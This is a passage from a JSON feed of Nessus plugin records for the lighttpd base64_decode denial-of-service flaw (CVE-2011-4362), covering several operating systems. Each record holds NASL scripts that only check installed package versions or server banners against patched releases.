POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57411);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-4362\");\n\n script_name(english:\"FreeBSD : lighttpd -- remote DoS in HTTP authentication (c6521b04-314b-11e1-9cf4-5404a67eef98)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"US-CERT/NIST reports :\n\nInteger signedness error in the base64_decode function in the HTTP\nauthentication functionality (http_auth.c) in lighttpd 1.4 before\n1.4.30 and 1.5 before SVN revision 2806 allows remote 
attackers to\ncause a denial of service (segmentation fault) via crafted base64\ninput that triggers an out-of-bounds read with a negative index.\"\n );\n # https://vuxml.freebsd.org/freebsd/c6521b04-314b-11e1-9cf4-5404a67eef98.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?336cdb6a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"lighttpd<1.4.30\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-01T03:19:52", "description": "According to its banner, the version of lighttpd running on the remote\nhost is prior to 1.4.30. It is, therefore, affected by a denial of\nservice vulnerability. The HTTP server allows out-of-bounds values to\nbe decoded during the auth process and later uses these values as\noffsets. 
Using negative values as offsets can result in application\ncrashes.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 27, "cvss3": {"score": 5.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}, "published": "2011-12-28T00:00:00", "title": "lighttpd < 1.4.30 base64_decode Function Out-of-Bounds Read Error DoS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:lighttpd:lighttpd"], "id": "LIGHTTPD_1_4_30.NASL", "href": "https://www.tenable.com/plugins/nessus/57410", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57410);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\n\n script_cve_id(\"CVE-2011-4362\");\n script_bugtraq_id(50851);\n script_xref(name:\"EDB-ID\", value:\"18295\");\n\n script_name(english:\"lighttpd < 1.4.30 base64_decode Function Out-of-Bounds Read Error DoS\");\n script_summary(english:\"Checks version in Server response header.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a denial of service\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of lighttpd running on the remote\nhost is prior to 1.4.30. It is, therefore, affected by a denial of\nservice vulnerability. The HTTP server allows out-of-bounds values to\nbe decoded during the auth process and later uses these values as\noffsets. 
Using negative values as offsets can result in application\ncrashes.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cdaac48a\");\n script_set_attribute(attribute:\"see_also\", value:\"http://redmine.lighttpd.net/issues/2370\");\n script_set_attribute(attribute:\"see_also\", value:\"http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2011_01.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to lighttpd version 1.4.30 or later. Alternatively, apply the\nvendor-supplied patch or disable mod_auth.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/28\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:lighttpd:lighttpd\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_keys(\"www/lighttpd\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 
80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"vcf.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nappname = \"lighttpd\";\nget_install_count(app_name:appname, exit_if_zero:TRUE);\nport = get_http_port(default:80);\napp_info = vcf::get_app_info(app:appname, port:port, webapp:TRUE);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [{\"fixed_version\":\"1.4.30\"}];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-01T01:18:01", "description": "Integer signedness error in the base64_decode function in the HTTP\nauthentication functionality (http_auth.c) in lighttpd 1.4 before\n1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to\ncause a denial of service (segmentation fault) via crafted base64\ninput that triggers an out-of-bounds read with a negative index.", "edition": 23, "published": "2013-09-04T00:00:00", "title": "Amazon Linux AMI : lighttpd (ALAS-2012-107)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:lighttpd-mod_geoip", "p-cpe:/a:amazon:linux:lighttpd-mod_mysql_vhost", "p-cpe:/a:amazon:linux:lighttpd-debuginfo", "p-cpe:/a:amazon:linux:lighttpd-fastcgi", "p-cpe:/a:amazon:linux:lighttpd", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2012-107.NASL", "href": "https://www.tenable.com/plugins/nessus/69597", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2012-107.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69597);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/04/18 15:09:34\");\n\n 
script_cve_id(\"CVE-2011-4362\");\n script_xref(name:\"ALAS\", value:\"2012-107\");\n\n script_name(english:\"Amazon Linux AMI : lighttpd (ALAS-2012-107)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Integer signedness error in the base64_decode function in the HTTP\nauthentication functionality (http_auth.c) in lighttpd 1.4 before\n1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to\ncause a denial of service (segmentation fault) via crafted base64\ninput that triggers an out-of-bounds read with a negative index.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2012-107.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update lighttpd' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:lighttpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:lighttpd-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:lighttpd-mod_geoip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:lighttpd-mod_mysql_vhost\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable 
Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"lighttpd-1.4.31-1.2.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"lighttpd-debuginfo-1.4.31-1.2.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"lighttpd-fastcgi-1.4.31-1.2.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"lighttpd-mod_geoip-1.4.31-1.2.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"lighttpd-mod_mysql_vhost-1.4.31-1.2.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd / lighttpd-debuginfo / lighttpd-fastcgi / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-12T10:10:43", "description": "This update fixes CVE-2011-4362 by updating to the latest release. 
It\nalso fixes problems that had been reported with previous releases,\nsuch as ssl-related crashes on startup. This update fixes some minor\nSSL related problems, as well as a connection stall bug. This update\nfixes some minor SSL related problems, as well as a connection stall\nbug. This update fixes some minor SSL related problems, as well as a\nconnection stall bug.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2012-06-26T00:00:00", "title": "Fedora 16 : lighttpd-1.4.31-1.fc16 (2012-9078)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "modified": "2012-06-26T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:lighttpd", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2012-9078.NASL", "href": "https://www.tenable.com/plugins/nessus/59690", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-9078.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59690);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-4362\");\n script_bugtraq_id(50851);\n script_xref(name:\"FEDORA\", value:\"2012-9078\");\n\n script_name(english:\"Fedora 16 : lighttpd-1.4.31-1.fc16 (2012-9078)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes CVE-2011-4362 by updating to the latest release. 
It\nalso fixes problems that had been reported with previous releases,\nsuch as ssl-related crashes on startup. This update fixes some minor\nSSL related problems, as well as a connection stall bug. This update\nfixes some minor SSL related problems, as well as a connection stall\nbug. This update fixes some minor SSL related problems, as well as a\nconnection stall bug.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=758624\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-June/082686.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7b2b223c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected lighttpd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"lighttpd-1.4.31-1.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-12T10:10:43", "description": "This update fixes CVE-2011-4362 by updating to the latest release. It\nalso fixes problems that had been reported with previous releases,\nsuch as ssl-related crashes on startup. This update fixes some minor\nSSL related problems, as well as a connection stall bug. This update\nfixes some minor SSL related problems, as well as a connection stall\nbug. 
This update fixes some minor SSL related problems, as well as a\nconnection stall bug.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2012-06-26T00:00:00", "title": "Fedora 17 : lighttpd-1.4.31-1.fc17 (2012-9040)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "modified": "2012-06-26T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:17", "p-cpe:/a:fedoraproject:fedora:lighttpd"], "id": "FEDORA_2012-9040.NASL", "href": "https://www.tenable.com/plugins/nessus/59689", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-9040.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59689);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-4362\");\n script_bugtraq_id(50851);\n script_xref(name:\"FEDORA\", value:\"2012-9040\");\n\n script_name(english:\"Fedora 17 : lighttpd-1.4.31-1.fc17 (2012-9040)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes CVE-2011-4362 by updating to the latest release. It\nalso fixes problems that had been reported with previous releases,\nsuch as ssl-related crashes on startup. This update fixes some minor\nSSL related problems, as well as a connection stall bug. This update\nfixes some minor SSL related problems, as well as a connection stall\nbug. 
This update fixes some minor SSL related problems, as well as a\nconnection stall bug.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=758624\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-June/082765.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?28c4e40a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected lighttpd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"lighttpd-1.4.31-1.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:01:04", "description": "The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - Integer signedness error in the base64_decode function\n in the HTTP authentication functionality (http_auth.c)\n in lighttpd 1.4 before 1.4.30 and 1.5 before SVN\n revision 2806 allows remote attackers to cause a denial\n of service (segmentation fault) via crafted base64 input\n that 
triggers an out-of-bounds read with a negative\n index. (CVE-2011-4362)", "edition": 24, "published": "2015-01-19T00:00:00", "title": "Oracle Solaris Third-Party Patch Update : lighttpd (cve_2011_4362_denial_of)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "modified": "2015-01-19T00:00:00", "cpe": ["cpe:/o:oracle:solaris:11.0", "p-cpe:/a:oracle:solaris:lighttpd"], "id": "SOLARIS11_LIGHTTPD_20120417.NASL", "href": "https://www.tenable.com/plugins/nessus/80697", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80697);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-4362\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : lighttpd (cve_2011_4362_denial_of)\");\n script_summary(english:\"Check for the 'entire' version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - Integer signedness error in the base64_decode function\n in the HTTP authentication functionality (http_auth.c)\n in lighttpd 1.4 before 1.4.30 and 1.5 before SVN\n revision 2806 allows remote attackers to cause a denial\n of service (segmentation fault) via crafted base64 input\n that triggers an out-of-bounds read with a negative\n index. 
(CVE-2011-4362)\"\n );\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4a913f44\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://blogs.oracle.com/sunsecurity/cve-2011-4362-denial-of-service-dos-vulnerability-in-lighttpd\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Solaris 11/11 SRU 6.6.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:lighttpd\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^lighttpd$\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd\");\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.0.6.0.6.0\", 
sru:\"SRU 6.6\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : lighttpd\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_warning(port:0, extra:error_extra);\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"lighttpd\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-20T14:36:33", "description": "This update of lighttpd fixes an out-of-bounds read due to a\nsignedness error which could cause a Denial of Service\n(CVE-2011-4362). Additionally an option was added to honor the server\ncipher order (resolves lighttpd#2364).", "edition": 19, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : lighttpd (openSUSE-SU-2012:0240-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_webdav", "cpe:/o:novell:opensuse:11.4", "p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool", "p-cpe:/a:novell:opensuse:lighttpd", "p-cpe:/a:novell:opensuse:lighttpd-mod_magnet-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost", "p-cpe:/a:novell:opensuse:lighttpd-mod_magnet", "p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_cml-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-debugsource", "p-cpe:/a:novell:opensuse:lighttpd-mod_cml", 